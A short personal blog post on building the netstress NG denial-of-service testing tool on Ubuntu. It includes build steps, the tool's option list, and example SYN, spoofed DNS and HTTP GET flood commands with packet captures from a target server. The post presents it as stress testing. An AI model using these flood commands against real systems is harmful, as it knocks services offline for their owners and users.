lost and found ( for me ? )

install netstress NG on ubuntu 12.04 32bit ( network stress tool )

about netstress NG
In short, netstress is DoS testing tool.
You can generate SYN flood, UDP flood, HTTP flood, DNS flood etc.

Please note that netstress source code seems to be for 32bit OS.
In my case, I can’t build netstress on 64bit OS.

# tail -1 /etc/lsb-release ;uname –ri
3.8.0-34-generic i386

install libcurses packages which are required to build netstress ng.
# apt-get install libncurses5 libncurses5-dev

build netstress
# tar xzvf netstress-3.0.7.tar.gz
# cd netstress-3.0.7/
# make menuconfig
# make
# sh compile_all.sh

# ./netstress.ful
lrandom  --help

               Metin KAYA <kayameti@gmail.com> from EnderUNIX SDT [http://www.EnderUNIX.org]
                       NETSTRESS a.k.a SALDIRAY v3.0.7

               --saddr,     -s:  source address
               --sport,     -p:  source port
               --daddr,     -d:  destination address
               --dport,     -P:  destination port
               --file,      -f:  the full path for the file of dns server list for ampdns flood
               --attack,    -a:  type of attack (ack, syn, fin, udp, dns, ampdns, igmp, winbomb, win98,
                                 get, post, syncook, isssyn)
               --process,   -n:  number of processes
               --buffer,    -b:  size of UDP packet
               --dnsqname,  -N:  hostname which will be queried
               --dnsqtype,  -t:  type of dns query (a, ns, cname, soa, wks, ptr, hinfo, minfo, mx, txt)
               --useragent, -u:  user agent parameter for http get flood
               --help,      -h:  shows this message

let’s use netstress

DNS attack
# ./netstress.fullrandom -d -P 53 -a dns -n 1 -t a

cap date collected on the target server
sending random A queries from spoofed source IP addresses.
# tshark -r a.pcap -R '(udp.port==53)' | head -10
Running as user "root" and group "root". This could be dangerous.
 1 0.000000000 -> DNS 149 Standard query response 0xaa17 No such name
 2 0.000013000 -> DNS 148 Standard query response 0x7517 No such name
 3 0.000025000 -> DNS 148 Standard query response 0xd317 No such name
 4 0.000037000 -> DNS 149 Standard query response 0xaf17 No such name
 5 0.000045000 -> DNS 151 Standard query response 0x2838 No such name
 6 0.000048000 -> DNS 151 Standard query response 0xe243 No such name
 7 0.000050000 -> DNS 76 Standard query 0xf517  A mk1330537033.net
 8 0.000053000 -> DNS 152 Standard query response 0xda7e No such name
 9 0.000055000 -> DNS 151 Standard query response 0xad4d No such name
10 0.000057000 -> DNS 75 Standard query 0xa117  A mk619198569.net

syn flood
# ./netstress.fullrandom -d -P 80 -a syn -n 1

HTTP GET flood
# ./netstress.fullrandom -d -P 80 -a get -n 1 -u test

cap data
Hypertext Transfer Protocol
   GET /334049107 HTTP/1.1\r\n
       [Expert Info (Chat/Sequence): GET /334049107 HTTP/1.1\r\n]
           [Message: GET /334049107 HTTP/1.1\r\n]
           [Severity level: Chat]
           [Group: Sequence]
       Request Method: GET
       Request URI: /334049107
       Request Version: HTTP/1.1
   User-Agent: test\r\n
   Connection: keep-alive\r\n
   [Full request URI:]

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.